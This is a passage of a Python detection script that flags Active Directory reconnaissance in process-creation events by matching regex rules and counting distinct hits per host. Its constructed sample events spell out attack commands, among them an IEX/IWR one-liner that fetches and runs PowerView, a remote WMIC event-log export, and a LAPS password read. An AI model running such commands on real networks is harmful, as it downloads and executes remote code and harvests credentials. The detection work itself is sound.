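     r"ms-mcs-admpwd|get-adcomputer\b.*-properties\s+\*"),
    ("ad_module_enum", r"^(powershell|pwsh)\.exe$",
     r"get-ad(user|group|object|computer)\b.*(-filter\s+\*|1\.2\.840\.113556\.1\.4\.803:=524288)"),
    ("adsisearcher", r"^(powershell|pwsh)\.exe$", r"\[adsisearcher\]"),
    ("powerview", r"^(powershell|pwsh)\.exe$", r"powerview\.ps1|get-domainuser"),
    ("remote_eventlog_export", r"^(wmic|wevtutil)\.exe$",
     r"wevtutil\s+epl\s+security|eventid=4776"),
    ("kerbrute_userenum", r"^kerbrute.*\.exe$", r"\buserenum\b"),
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I)) for name, img, cmd in RULES]


def basename(path: str) -> str:
    """Last component of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def classify(event: dict) -> list:
    """Names of every rule the event trips, in RULES order; empty if nothing matched."""
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    return [name for name, img_re, cmd_re in COMPILED
            if img_re.search(image) and cmd_re.search(cmdline)]


def triage(events, min_distinct: int = 2) -> dict:
    """Hosts on which at least min_distinct distinct rules fired, mapped to the sorted
    rule names. One discovery command is routine admin noise; several different ones
    on the same host is the behaviour chain worth escalating."""
    per_host = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            per_host.setdefault(ev["Computer"], set()).update(hits)
    return {host: sorted(rules) for host, rules in per_host.items() if len(rules) >= min_distinct}


# Constructed sample events (not captured telemetry).
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user /domain"},
    {"Computer": "WS01", "Image": r"C:\Windows\System32\net1.exe",
     "CommandLine": r"C:\Windows\system32\net1 group /domain"},
    {"Computer": "WS01", "Image": r"C:\Users\alice\AppData\Local\Temp\AdFind.exe",
     "CommandLine": "AdFind.exe -sc admincountdmp"},
    {"Computer": "WS02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-ADComputer WS02 -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime"},
    {"Computer": "WS02", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use \\fs01\share"},                      # benign
    {"Computer": "WS03", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic.exe /node:10.0.0.5 process call create "wevtutil epl Security C:\ntlmusers.evtx /q:Event[System[(EventID=4776)]]"'},
    {"Computer": "WS03", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser\""},
    {"Computer": "WS04", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Date"},                      # benign
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Computer"], classify(ev) or "-", ev["CommandLine"][:60])
    print("escalate:", triage(SAMPLE_EVENTS))
```

With the sample data, WS01 (net plus AdFind) and WS03 (remote event-log export plus PowerView) are escalated, WS02 shows a single LAPS attribute read that a rule on its own would surface, and WS04 stays quiet.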